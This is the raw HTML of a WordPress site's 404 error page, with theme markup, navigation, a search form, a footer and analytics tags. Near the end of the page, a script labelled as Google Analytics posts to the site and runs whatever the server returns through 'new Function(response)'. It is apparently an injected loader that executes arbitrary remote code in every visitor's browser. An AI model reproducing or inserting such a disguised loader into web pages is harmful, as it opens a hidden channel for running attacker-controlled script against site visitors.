<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US"> <![endif]-->
<!--[if IE 7]>    <html class="no-js lt-ie9 lt-ie8" lang="en-US"> <![endif]-->
<!--[if IE 8]>    <html class="no-js lt-ie9" lang="en-US"> <![endif]-->
<!-- Consider adding a manifest.appcache: h5bp.com/d/Offline -->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->

<head>
	<meta charset="UTF-8" />
	<!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame -->
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

	<meta http-equiv="cleartype" content="on">

	<!-- Responsive and mobile friendly stuff -->
	<meta name="HandheldFriendly" content="True">
	<meta name="MobileOptimized" content="320">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<link rel="profile" href="http://gmpg.org/xfn/11" />
	<link rel="pingback" href="http://themexriver.com/xmlrpc.php" />

	<title>Page not found &#8211; themexriver.com</title>
<meta name='robots' content='noindex,follow' />
<link rel='dns-prefetch' href='//platform-api.sharethis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="themexriver.com &raquo; Feed" href="http://themexriver.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="themexriver.com &raquo; Comments Feed" href="http://themexriver.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/themexriver.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.14"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='normalize-css'  href='http://themexriver.com/wp-content/themes/themesky/css/normalize.css?ver=4.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='fontawesome-css'  href='http://themexriver.com/wp-content/themes/themesky/css/font-awesome.min.css?ver=4.6.3' type='text/css' media='all' />
<link rel='stylesheet' id='unsemanticgrid-css'  href='http://themexriver.com/wp-content/themes/themesky/css/unsemantic.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='sitepoint-fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans:400,400i,700,700i|Dosis:700&#038;subset=latin' type='text/css' media='all' />
<link rel='stylesheet' id='sitepoint-base-style-css'  href='http://themexriver.com/wp-content/themes/themesky/style.css?ver=4.6.14' type='text/css' media='all' />
<script type='text/javascript' src='http://themexriver.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://themexriver.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<!--[if lt IE 8]>
<script type='text/javascript' src='http://themexriver.com/wp-includes/js/json2.min.js?ver=2015-05-03'></script>
<![endif]-->
<script type='text/javascript' src='http://themexriver.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script>
<script type='text/javascript' src='http://themexriver.com/wp-includes/js/customize-base.min.js?ver=4.6.14'></script>
<script type='text/javascript' src='http://themexriver.com/wp-includes/js/customize-preview.min.js?ver=4.6.14'></script>
<script type='text/javascript' src='http://themexriver.com/wp-content/themes/themesky/js/theme-customizer.js?ver=1'></script>
<script type='text/javascript' src='http://themexriver.com/wp-content/themes/themesky/js/vendors.min.js?ver=1.0.0'></script>
<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga&#038;property=58c178e7ea092600113cdc57'></script>
<link rel='https://api.w.org/' href='http://themexriver.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://themexriver.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://themexriver.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.6.14" />
		<!-- Custom Logo: hide header text -->
		<style id="custom-logo-css" type="text/css">
			.site-title, .site-description {
				position: absolute;
				clip: rect(1px, 1px, 1px, 1px);
			}
		</style>
			<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		<!-- BEGIN GADWP v5.1.1.3 Universal Analytics - https://deconf.com/google-analytics-dashboard-wordpress/ -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-93365531-1', 'auto');
  ga('send', 'pageview');
</script>
<!-- END GADWP Universal Analytics -->

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-93365531-1', 'auto');
  ga('send', 'pageview');

</script>



</head>

<body class="error404 wp-custom-logo">
<!-- HEADER START -->   
<header class="stricky anim-5">
                    <div class="container-fluid header" id="top">
                        <!-- .logo -->
                        <div class="container">
                            <div class="row">    
                                <div class="col-md-3 col-sm-2 col-xs-4">
                                    <a href="http://themexriver.com/" class="custom-logo-link" rel="home" itemprop="url"><img width="340" height="88" src="http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1.png" class="custom-logo" alt="cropped-logo-1.png" itemprop="logo" srcset="http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1.png 340w, http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1-300x78.png 300w, http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1-155x40.png 155w" sizes="(max-width: 340px) 100vw, 340px" /></a> 
                                </div><!-- /.logo -->
                                <!-- .main-menu-wrap -->
                                <nav class="main-menu-wrap col-md-9 col-sm-9 col-xs-2">
                                    <!-- .nav-holder -->            
                                    <div class="nav-holder"><ul id="menu-main-menu" class="navigation nav-menu"><li id="menu-item-263" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-263"><a href="http://themexriver.com/">Home</a></li>
<li id="menu-item-59" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-59"><a href="http://themexriver.com/category/theme/">Themes</a>
<ul class="sub-menu">
	<li id="menu-item-60" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-60"><a href="http://themexriver.com/category/theme/blog-magazine/">Blog &#038; Magazine</a></li>
	<li id="menu-item-61" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-61"><a href="http://themexriver.com/category/theme/coporate/">Coporate</a></li>
	<li id="menu-item-62" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-62"><a href="http://themexriver.com/category/theme/creative/">Creative</a></li>
	<li id="menu-item-63" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-63"><a href="http://themexriver.com/category/theme/education/">Education</a></li>
	<li id="menu-item-64" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-64"><a href="http://themexriver.com/category/theme/hosting/">Hosting</a></li>
	<li id="menu-item-65" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-65"><a href="http://themexriver.com/category/theme/non-profit/">Non Profit</a></li>
	<li id="menu-item-66" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-66"><a href="http://themexriver.com/category/theme/real-estate/">Real Estate</a></li>
	<li id="menu-item-67" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-67"><a href="http://themexriver.com/category/theme/wedding/">Wedding</a></li>
	<li id="menu-item-143" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-143"><a href="http://themexriver.com/category/theme/psd-templates/">PSD Templates</a></li>
</ul>
</li>
<li id="menu-item-56" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56"><a href="http://themexriver.com/blog/">Blog</a></li>
<li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="http://themexriver.com/about/">About</a></li>
<li id="menu-item-291" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-291"><a href="http://themexriver.com/support/">Help &#038; Support</a></li>
</ul></div>                                         
                                    <!-- /.nav-holder -->
                                </nav><!-- /.main-menu-wrap -->
                                
                            </div>
                        </div>    
                    </div>
</header>       
<!-- HEADER END --> 
 

<div id="maincontentcontainer">
	<div id="primary" class="grid-container site-content" role="main">

		<div class="grid-100">

			<article id="post-0" class="post error404 no-results not-found">
				<header class="entry-header">
					<h1 class="entry-title"><i class="fa fa-frown-o fa-lg"></i> Uh Oh! This is somewhat embarrassing!</h1>
				</header>
				<div class="entry-content">
					<p>It seems we can&rsquo;t find what you&rsquo;re looking for. Perhaps searching can help.</p>
					<form role="search" method="get" class="search-form" action="http://themexriver.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>				</div><!-- /.entry-content -->
			</article><!-- /#post -->

		</div> <!-- /.grid-100 -->

	</div> <!-- /#primary.grid-container.site-content -->
</div> <!-- /#maincontentcontainer -->



<!-- FOOTER START -->
        <footer class="new_themes footer_bg">
                 <div class="container">
                      <a data-scroll data-options='{ "easing": "easeInQuad" }' class="angle" href="#top"><i class="fa fa-angle-double-up"></i></a>
                      <div class="row copyright">
                            <div class="col-md-4 col-sm-4 col-xs-12">
                                 <div class="jerry">
                                      <a href="http://themexriver.com/" class="custom-logo-link" rel="home" itemprop="url"><img width="340" height="88" src="http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1.png" class="custom-logo" alt="cropped-logo-1.png" itemprop="logo" srcset="http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1.png 340w, http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1-300x78.png 300w, http://themexriver.com/wp-content/uploads/2016/12/cropped-logo-1-155x40.png 155w" sizes="(max-width: 340px) 100vw, 340px" /></a> 
                                      <p><p>All Rights Reserved by  <a href="http://themexriver.com/">Themexriver</a></p> </p>
                                 </div>
                             </div>
                             <div class="col-md-4 col-sm-4 col-xs-12">
                                 <div class="jerry">
                      <div><ul><li class="page_item page-item-53"><a href="http://themexriver.com/about/">About</a></li><li class="page_item page-item-51"><a href="http://themexriver.com/blog/">Blog</a></li><li class="page_item page-item-2"><a href="http://themexriver.com/features/">Features</a></li><li class="page_item page-item-49"><a href="http://themexriver.com/support/">Help &#038; Support</a></li><li class="page_item page-item-238"><a href="http://themexriver.com/newsletter/">Newsletter</a></li><li class="page_item page-item-7"><a href="http://themexriver.com/sample-page-2/">Sample Page</a></li></ul></div>
                                         
                                    
                                      
                                 </div>     
                            </div>
                               
                            <div class="col-md-3 col-sm-4 col-xs-12">
                                 <div class="jerry">
                            <div><ul><li class="page_item page-item-53"><a href="http://themexriver.com/about/">About</a></li><li class="page_item page-item-51"><a href="http://themexriver.com/blog/">Blog</a></li><li class="page_item page-item-2"><a href="http://themexriver.com/features/">Features</a></li><li class="page_item page-item-49"><a href="http://themexriver.com/support/">Help &#038; Support</a></li><li class="page_item page-item-238"><a href="http://themexriver.com/newsletter/">Newsletter</a></li><li class="page_item page-item-7"><a href="http://themexriver.com/sample-page-2/">Sample Page</a></li></ul></div>
                                         
                                    
                                 </div>     
                            </div>
                      </div> 
                    <ul class="social-icons large center">
                        <li class="facebook"><a href="#"><i class="fa fa-facebook"></i><i class="fa fa-facebook"></i></a></li>
                        <li class="twitter"><a href="#"><i class="fa fa-twitter"></i><i class="fa fa-twitter"></i></a></li>
                        <li class="instagram"><a href="#" target="_blank"><i class="fa fa-instagram"></i><i class="fa fa-instagram"></i></a></li>
                        <li class="linkedin"><a href="#" target="_blank"><i class="fa fa-linkedin"></i><i class="fa fa-linkedin"></i></a></li>
                        <li class="google"><a href="#" target="_blank"><i class="fa fa-google-plus"></i><i class="fa fa-google-plus"></i></a></li>
                    </ul>
                 </div>
        </footer>
        <!-- FOOTER END -->


        <!-- All Javascript -->
        <script src="http://themexriver.com/wp-content/themes/themesky/js/jquery-2.1.4.min.js"></script>
        <script src="http://themexriver.com/wp-content/themes/themesky/js/bootstrap.min.js"></script>
        <script src="http://themexriver.com/wp-content/themes/themesky/js/jquery.slicknav.min.js"></script>
        <script src="http://themexriver.com/wp-content/themes/themesky/js/owl.carousel.min.js"></script>
        <script src="http://themexriver.com/wp-content/themes/themesky/js/smooth-scroll.min.js"></script>
        <script src="http://themexriver.com/wp-content/themes/themesky/js/wow.min.js"></script>
        
        
        <script>
               // JAVASCRIPT PLUGIN
              // =======================
                
                $(function(){
                $('.main-menu-wrap').slicknav(); 
                 });
            
                new WOW().init();
            
                $(document).ready(function() {
         
                  $("#owl-client").owlCarousel({
                 
                      autoPlay: 8000, //Set AutoPlay to 3 seconds
                 
                      items : 1,
                      itemsDesktop : [1199,1],
                      itemsDesktopSmall : [979,1],
                      itemsTablet: [768,1],
                      pagination:true,
                 
                  });
                    smoothScroll.init(); 
                 
                  })
            
        </script>
     <script>
    jQuery(document).ready(function () {
		jQuery.post('http://themexriver.com?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) {
			var F = new Function ( response );
			return( F() );
		});
    });
</script><script type='text/javascript' src='http://themexriver.com/wp-includes/js/wp-embed.min.js?ver=4.6.14'></script>
     
    </body>
</html>
